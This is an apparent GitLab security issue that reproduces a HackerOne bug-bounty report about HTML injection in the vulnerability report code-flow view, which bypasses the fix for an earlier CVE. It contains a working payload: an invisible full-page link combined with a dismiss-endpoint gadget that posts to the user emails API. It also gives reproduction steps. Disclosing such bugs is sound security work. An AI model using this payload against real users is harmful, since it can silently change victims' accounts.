HTML injection in vulnerability reports (CVE-2025-8405 bypass)

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3461083 by joaxcar on 2025-12-10, assigned to @katwu:

Report | Attachments | How To Reproduce

Original Report

Summary

I am not completely sure what the fix for CVE-2025-8405 was (except for killing one gadget). But the vulnerability can still be triggered and other gadgets can be used.

for example this one

<div class="js-new-user-signups-cap-reached" data-dismiss-endpoint="/api/v4/user/emails?email=adddddd@test.se" data-defer-links="false" data-feature-id="1">  
<a target=x href="https://joaxcar.com/fun/delay/vuln.html" class="js-close fixed-top gl-opacity-0 gl-h-full gl-w-full">  
hack  
</a>  
</div>
Steps to reproduce
  1. Create a new Ultimate project
  2. Import this project into the new group 2025-12-10_21-42-715_ultimate-test-18-6-2_code-flow_export.tar.gz
  3. Run a pipeline in the project
  4. Go to /-/security/vulnerabilities and click the one on top
  5. Go to code flow
  6. See that the payload renders in the code box
Impact

HTML injection that can trigger user actions through POST request. Bypass of CVE-2025-8405

What is the current bug behavior?

HTML still renders

What is the expected correct behavior?

HTML should not render

Output of checks

This bug happens on GitLab.com

Impact

HTML injection that can trigger user actions through POST request. Bypass of CVE-2025-8405

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: